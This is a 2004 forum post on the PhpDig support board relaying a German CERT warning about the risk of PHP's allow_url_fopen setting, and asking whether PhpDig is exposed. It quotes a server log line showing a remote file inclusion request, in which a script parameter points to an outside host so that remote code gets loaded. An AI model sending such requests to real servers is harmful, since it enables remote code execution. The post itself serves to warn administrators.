PhpDig.net

Go Back   PhpDig.net > PhpDig Forums > Troubleshooting

Reply
 
Thread Tools
Old 10-07-2004, 07:32 AM   #1
Rolandks
Purple Mole
 
Rolandks's Avatar
 
Join Date: Sep 2003
Location: Kassel, Germany
Posts: 119
Exclamation Security Risk: allow_url_fopen = ON

The German CERTs (Computer Emergency Response Teams) reports a Security Risk if in php.ini: allow_url_fopen = ON.
Scripts who allow to load URL as parameter can use as attack. Many attacks started last weeks to all servers.

In log-Files you found f. ex.:
[28/Sep/2004:18:03:07 +0200] "GET
/path/to/script.php?variablenname=http://192.168.1.2:4213/ HTTP/1.0" 200 15183 "-" "Wget/1.8.1"

Link to message for German User:
http://www.heise.de/security/news/meldung/51838

Any secure risk for phpdig ?

Roland
Rolandks is offline   Reply With Quote
Reply

Thread Tools

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off
Forum Jump

Similar Threads
Thread Thread Starter Forum Replies Last Post
allow_url_fopen not supported vuurvos Script Installation 1 10-05-2005 06:56 AM
Security issues Niele How-to Forum 1 04-25-2005 09:52 AM
allow_url_fopen question cefiro How-to Forum 3 02-21-2005 01:14 PM
got hacket, how? security hole? Killersushi Troubleshooting 2 07-12-2004 07:45 PM
security rom How-to Forum 1 02-28-2004 03:21 PM


All times are GMT -8. The time now is 02:03 PM.


Powered by vBulletin® Version 3.7.3
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.
Copyright © 2001 - 2005, ThinkDing LLC. All Rights Reserved.